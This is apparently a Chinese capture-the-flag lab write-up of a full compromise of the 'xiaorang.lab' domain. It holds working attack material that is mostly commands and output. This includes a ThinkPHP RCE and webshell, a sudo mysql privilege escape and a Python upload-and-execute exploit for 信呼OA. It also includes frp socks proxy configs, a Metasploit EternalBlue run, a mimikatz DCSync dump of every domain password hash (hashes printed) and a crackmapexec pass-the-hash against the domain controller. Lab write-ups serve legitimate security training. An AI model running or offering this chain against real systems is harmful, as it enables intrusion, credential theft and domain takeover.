信息搜集
thinkphp 5.0.23 RCE 检测一下
写马
反弹shell
得到第一半flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 www-data@ubuntu-web01:/$ sudo mysql -e '\! cat /root/flag/f*' sudo mysql -e '\! cat /root/flag/f*' ██ ██ ██ ██ ███████ ███████ ██ ████ ██ ████████ ░░██ ██ ░██ ████ ██░░░░░██ ░██░░░░██ ████ ░██░██ ░██ ██░░░░░░██ ░░██ ██ ░██ ██░░██ ██ ░░██░██ ░██ ██░░██ ░██░░██ ░██ ██ ░░ ░░███ ░██ ██ ░░██ ░██ ░██░███████ ██ ░░██ ░██ ░░██ ░██░██ ██░██ ░██ ██████████░██ ░██░██░░░██ ██████████░██ ░░██░██░██ █████ ██ ░░██ ░██░██░░░░░░██░░██ ██ ░██ ░░██ ░██░░░░░░██░██ ░░████░░██ ░░░░██ ██ ░░██░██░██ ░██ ░░███████ ░██ ░░██░██ ░██░██ ░░███ ░░████████ ░░ ░░ ░░ ░░ ░░ ░░░░░░░ ░░ ░░ �u��░ ░░ ░░ ░░░ ░░░░░░░░ Congratulations!!! You found the first flag, the next flag may be in a server in the internal network. flag01: flag{60b53231- www-data@ubuntu-web01:/$
扫内网
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 www-data@ubuntu-web01:/tmp$ chmod 777 fscan chmod 777 fscanwww-data@ubuntu-web01:/tmp$ ls -al ls -altotal 8396 drwxrwxrwt 2 root root 4096 Apr 17 13:53 . drwxr-xr-x 18 root root 4096 Apr 17 13:39 .. -rwxrwxrwx 1 www-data www-data 8585724 Apr 17 13:53 fscan www-data@ubuntu-web01:/tmp$ ip a ip a 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link /loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000 link /ether 00:16:3e:0f:3f:f4 brd ff:ff:ff:ff:ff:ff inet 172.22.1.15/16 brd 172.22.255.255 scope global dynamic eth0 valid_lft 315359108sec preferred_lft 315359108sec inet6 fe80::216:3eff:fe0f:3ff4/64 scope link valid_lft forever preferred_lft forever www-data@ubuntu-web01:/tmp$ ./fscan -h 172.22.1.15/24 ./fscan -h 172.22.1.15/24 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | | (_| | (__| < │ │ \____/ |___/\___|_| \__,_|\___|_|\_\ │ └──────────────────────────────────────────────┘ Fscan Version: 2.0.0 [2025-04-17 13:54:36] [INFO] 暴力破解线程数: 1 [2025-04-17 13:54:36] [INFO] 开始信息扫描 [2025-04-17 13:54:36] [INFO] CIDR范围: 172.22.1.0-172.22.1.255 [2025-04-17 13:54:37] [INFO] 生成IP范围: 172.22.1.0.%!d(string=172.22.1.255) - %!s(MISSING).%!d(MISSING) [2025-04-17 13:54:37] [INFO] 解析CIDR 172.22.1.15/24 -> IP范围 172.22.1.0-172.22.1.255 [2025-04-17 13:54:37] [INFO] 最终有效主机数量: 256 [2025-04-17 13:54:37] [INFO] 开始主机扫描 [2025-04-17 13:54:37] [INFO] 正在尝试无监听ICMP探测... [2025-04-17 13:54:37] [INFO] 当前用户权限不足,无法发送ICMP包 [2025-04-17 13:54:37] [INFO] 切换为PING方式探测... [2025-04-17 13:54:37] [SUCCESS] 目标 172.22.1.2 存活 (ICMP) [2025-04-17 13:54:37] [SUCCESS] 目标 172.22.1.15 存活 (ICMP) [2025-04-17 13:54:37] [SUCCESS] 目标 172.22.1.21 存活 (ICMP) [2025-04-17 13:54:37] [SUCCESS] 目标 172.22.1.18 存活 (ICMP) [2025-04-17 13:54:43] [INFO] 存活主机数量: 4 [2025-04-17 13:54:43] [INFO] 有效端口数量: 233 [2025-04-17 13:54:43] [SUCCESS] 端口开放 172.22.1.2:139 [2025-04-17 13:54:43] [SUCCESS] 端口开放 172.22.1.2:88 [2025-04-17 13:54:43] [SUCCESS] 端口开放 172.22.1.18:80 [2025-04-17 13:54:43] [SUCCESS] 端口开放 172.22.1.15:80 [2025-04-17 13:54:43] [SUCCESS] 端口开放 172.22.1.15:22 [2025-04-17 13:54:43] [SUCCESS] 端口开放 172.22.1.18:135 [2025-04-17 13:54:43] [SUCCESS] 端口开放 172.22.1.21:135 [2025-04-17 13:54:43] [SUCCESS] 端口开放 172.22.1.2:135 [2025-04-17 13:54:43] [SUCCESS] 端口开放 172.22.1.21:445 [2025-04-17 13:54:43] [SUCCESS] 端口开放 172.22.1.18:445 [2025-04-17 13:54:43] [SUCCESS] 端口开放 172.22.1.2:445 [2025-04-17 13:54:43] [SUCCESS] 端口开放 172.22.1.2:389 [2025-04-17 13:54:43] [SUCCESS] 端口开放 172.22.1.21:139 [2025-04-17 13:54:43] [SUCCESS] 端口开放 172.22.1.18:139 [2025-04-17 13:54:43] [SUCCESS] 端口开放 172.22.1.18:3306 [2025-04-17 13:54:43] [SUCCESS] 服务识别 172.22.1.15:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.] [2025-04-17 13:54:48] [SUCCESS] 服务识别 172.22.1.18:3306 => [mysql] 产品:MySQL 信息:unauthorized Banner:[D.j Host ' 172.22.1.15' is not allowed to connect to this MySQL server] [2025-04-17 13:54:48] [SUCCESS] 服务识别 172.22.1.2:139 => Banner:[.] [2025-04-17 13:54:48] [SUCCESS] 服务识别 172.22.1.2:88 => [2025-04-17 13:54:48] [SUCCESS] 服务识别 172.22.1.21:445 => [2025-04-17 13:54:49] [SUCCESS] 服务识别 172.22.1.18:445 => [2025-04-17 13:54:49] [SUCCESS] 服务识别 172.22.1.2:445 => [2025-04-17 13:54:49] [SUCCESS] 服务识别 172.22.1.2:389 => [ldap] 产品:Microsoft Windows Active Directory LDAP 系统:Windows 信息:Domain: xiaorang.lab, Site: Default-First-Site-Name [2025-04-17 13:54:49] [SUCCESS] 服务识别 172.22.1.18:80 => [http] [2025-04-17 13:54:49] [SUCCESS] 服务识别 172.22.1.21:139 => Banner:[.] [2025-04-17 13:54:49] [SUCCESS] 服务识别 172.22.1.15:80 => [http] [2025-04-17 13:54:49] [SUCCESS] 服务识别 172.22.1.18:139 => Banner:[.] [2025-04-17 13:55:48] [SUCCESS] 服务识别 172.22.1.18:135 => [2025-04-17 13:55:48] [SUCCESS] 服务识别 172.22.1.21:135 => [2025-04-17 13:55:48] [SUCCESS] 服务识别 172.22.1.2:135 => [2025-04-17 13:55:49] [INFO] 存活端口数量: 15 [2025-04-17 13:55:49] [INFO] 开始漏洞扫描 [2025-04-17 13:55:49] [INFO] 加载的插件: findnet, ldap, ms17010, mysql, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle [2025-04-17 13:55:49] [SUCCESS] NetInfo 扫描结果 目标主机: 172.22.1.2 主机名: DC01 发现的网络接口: IPv4地址: └─ 172.22.1.2 [2025-04-17 13:55:49] [SUCCESS] NetInfo 扫描结果 目标主机: 172.22.1.21 主机名: XIAORANG-WIN7 发现的网络接口: IPv4地址: └─ 172.22.1.21 [2025-04-17 13:55:49] [INFO] 系统信息 172.22.1.2 [Windows Server 2016 Datacenter 14393] [2025-04-17 13:55:49] [SUCCESS] 网站标题 http://172.22.1.15 状态码:200 长度:5578 标题:Bootstrap Material Admin [2025-04-17 13:55:49] [SUCCESS] NetBios 172.22.1.2 DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393 [2025-04-17 13:55:49] [SUCCESS] NetInfo 扫描结果 目标主机: 172.22.1.18 主机名: XIAORANG-OA01 发现的网络接口: IPv4地址: └─ 172.22.1.18 [2025-04-17 13:55:49] [SUCCESS] 发现漏洞 172.22.1.21 [Windows Server 2008 R2 Enterprise 7601 Service Pack 1] MS17-010 [2025-04-17 13:55:49] [SUCCESS] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1 [2025-04-17 13:55:49] [SUCCESS] 网站标题 http://172.22.1.18 状态码:302 长度:0 标题:无标题 重定向地址: http://172.22.1.18?m=login [2025-04-17 13:55:49] [SUCCESS] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600 [2025-04-17 13:55:50] [SUCCESS] 目标: http://172.22.1.15:80 漏洞类型: poc-yaml-thinkphp5023-method-rce 漏洞名称: poc1 详细信息: links:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce [2025-04-17 13:55:50] [SUCCESS] 网站标题 http://172.22.1.18?m=login 状态码:200 长度:4012 标题:信呼协同办公系统
1 2 3 172.22.1.2 DC 172.22.1.21 MS17-010 172.22.1.18 信呼OA
172.22.1.18-信呼nday frps.ini
1 2 3 4 5 6 7 [common] bind_addr = 0.0 .0.0 bind_port = 7000 dashboard_port = 7500 dashboard_user = admindashboard_pwd = 123456
frpc.ini
1 2 3 4 5 6 7 8 9 10 11 [common] server_addr =xxxxxxxxxserver_port = 7000 tls_enable = ture[plugin socks] type = tcpremote_port =8886 plugin = socks5use_encryption = true use_compression = true
访问到
admin/admin123登录
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 import requestssession = requests.session() url_pre = 'http://172.22.1.18/' url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953' url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913' url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11' data1 = { 'rempass' : '0' , 'jmpass' : 'false' , 'device' : '1625884034525' , 'ltype' : '0' , 'adminuser' : 'YWRtaW4=' , 'adminpass' : 'YWRtaW4xMjM=' , 'yanzm' : '' } r = session.post(url1, data=data1) r = session.post(url2, files={'file' : open ('1.php' , 'r+' )}) filepath = str (r.json()['filepath' ]) filepath = "/" + filepath.split('.uptemp' )[0 ] + '.php' id = r.json()['id' ]print (id )print (filepath)url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id } ' r = session.get(url3) r = session.get(url_pre + filepath + "?1=system('dir');" ) print (r.text)
运行得到返回地址
1 2 3 4 5 6 7 8 D:\python3.7\python.exe C:\Users\31702\Desktop\debug\1.py 9 /upload/2025-04/17_14190460.php <br /> <b>Notice</b>: Undefined offset: 1 in <b>C:\phpStudy\PHPTutorial\WWW\upload\2025-04\17_14190460.php</b> on line <b>1</b><br /> 进程已结束,退出代码为 0
拿到flag2
1 2 3 4 5 6 7 8 9 10 11 12 13 ___ ___ ___ ________ ________ ________ ________ ________ ________ |\ \ / /|\ \|\ __ \|\ __ \|\ __ \|\ __ \|\ ___ \|\ ____\ \ \ \/ / | \ \ \ \|\ \ \ \|\ \ \ \|\ \ \ \|\ \ \ \\ \ \ \ \___| \ \ / / \ \ \ \ __ \ \ \\\ \ \ _ _\ \ __ \ \ \\ \ \ \ \ ___ / \/ \ \ \ \ \ \ \ \ \\\ \ \ \\ \\ \ \ \ \ \ \\ \ \ \ \|\ \ / /\ \ \ \__\ \__\ \__\ \_______\ \__\\ _\\ \__\ \__\ \__\\ \__\ \_______\ /__/ /\ __\ \|__|\|__|\|__|\|_______|\|__|\|__|\|__|\|__|\|__| \|__|\|_______| |__|/ \|__| flag02: 2ce3-4813-87d4- Awesome! ! ! You found the second flag, now you can attack the domain controller.
172.22.1.21-永恒之蓝 接下来打下一个,首先kali配置proxychains
1 2 3 4 5 6 proxychains msfconsole use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp show options set rhosts 172.22.1.21 run
172.22.1.2-横向 1 2 load kiwi kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 meterpreter > load kiwi [proxychains] DLL init: proxychains-ng 4 .17 [proxychains] DLL init: proxychains-ng 4 .17 Loading extension kiwi... .#####. mimikatz 2 .2 .0 20191125 (x64/windows) .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ Success. [proxychains] DLL init: proxychains-ng 4 .17 [proxychains] DLL init: proxychains-ng 4 .17 [proxychains] DLL init: proxychains-ng 4 .17 [proxychains] DLL init: proxychains-ng 4 .17 [proxychains] DLL init: proxychains-ng 4 .17 meterpreter > sysinfo [proxychains] DLL init: proxychains-ng 4 .17 [proxychains] DLL init: proxychains-ng 4 .17 Computer : XIAORANG-WIN7 OS : Windows Server 2008 R2 (6 .1 Build 7601 , Service Pack 1 ). Architecture : x64 System Language : zh_CN Domain : XIAORANG Logged On Users : 1 Meterpreter : x64/windows [proxychains] DLL init: proxychains-ng 4 .17 [proxychains] DLL init: proxychains-ng 4 .17 [proxychains] DLL init: proxychains-ng 4 .17 [proxychains] DLL init: proxychains-ng 4 .17 [proxychains] DLL init: proxychains-ng 4 .17 meterpreter > kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv [proxychains] DLL init: proxychains-ng 4 .17 [proxychains] DLL init: proxychains-ng 4 .17 [DC] 'xiaorang.lab' will be the domain [DC] 'DC01.xiaorang.lab' will be the DC server [DC] Exporting domain 'xiaorang.lab' [rpc] Service : ldap [rpc] AuthnSvc : GSS_NEGOTIATE (9 ) 502 krbtgt fb812eea13a18b7fcdb8e6d67ddc205b 514 1106 Marcus e07510a4284b3c97c8e7dee970918c5c 512 1107 Charles f6a9881cd5ae709abb4ac9ab87f24617 512 1000 DC01$ f0dee3e75230ecc2a06076e70de6dcf8 532480 500 Administrator 10 cf89a850fb1cdbe6bb432b859164c8 512 1104 XIAORANG-OA01$ 1 b4237e449ac446607663c4f2793019a 4096 1108 XIAORANG-WIN7$ 59 d3f4db5fc252d89c3494b4154a2133 4096 [proxychains] DLL init: proxychains-ng 4 .17 [proxychains] DLL init: proxychains-ng 4 .17 [proxychains] DLL init: proxychains-ng 4 .17 [proxychains] DLL init: proxychains-ng 4 .17 [proxychains] DLL init: proxychains-ng 4 .17 meterpreter >
哈希传递
1 proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 ┌──(root㉿kali)-[~] └─# proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt" [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] Strict chain ... 45.207.197.131:8886 ... 172.22.1.2:445 ... OK [proxychains] Strict chain ... 45.207.197.131:8886 ... 172.22.1.2:135 ... OK SMB 172.22.1.2 445 DC01 [*] Windows Server 2016 Datacenter 14393 x64 (name:DC01) (domain:xiaorang.lab) (signing:True) (SMBv1:True) [proxychains] Strict chain ... 45.207.197.131:8886 ... 172.22.1.2:445 ... OK SMB 172.22.1.2 445 DC01 [+] xiaorang.lab\administrator:10cf89a850fb1cdbe6bb432b859164c8 (Pwn3d!) [proxychains] Strict chain ... 45.207.197.131:8886 ... 172.22.1.2:135 ... OK [proxychains] Strict chain ... 45.207.197.131:8886 ... 172.22.1.2:49668 ... OK SMB 172.22.1.2 445 DC01 [+] Executed command SMB 172.22.1.2 445 DC01 ___ ___ SMB 172.22.1.2 445 DC01 \\ / / / / // | | // ) ) // ) ) // | | /| / / // ) ) SMB 172.22.1.2 445 DC01 \ / / / //__| | // / / //___/ / //__| | //| / / // SMB 172.22.1.2 445 DC01 / / / / / ___ | // / / / ___ ( / ___ | // | / / // ____ SMB 172.22.1.2 445 DC01 / /\\ / / // | | // / / // | | // | | // | / / // / / SMB 172.22.1.2 445 DC01 / / \\ __/ /___ // | | ((___/ / // | | // | | // |/ / ((____/ / SMB 172.22.1.2 445 DC01 SMB 172.22.1.2 445 DC01 SMB 172.22.1.2 445 DC01 flag03: e8f88d0d43d6} SMB 172.22.1.2 445 DC01 SMB 172.22.1.2 445 DC01 Unbelievable! ! You found the last flag, which means you have full control over the entire domain network.
1 flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}
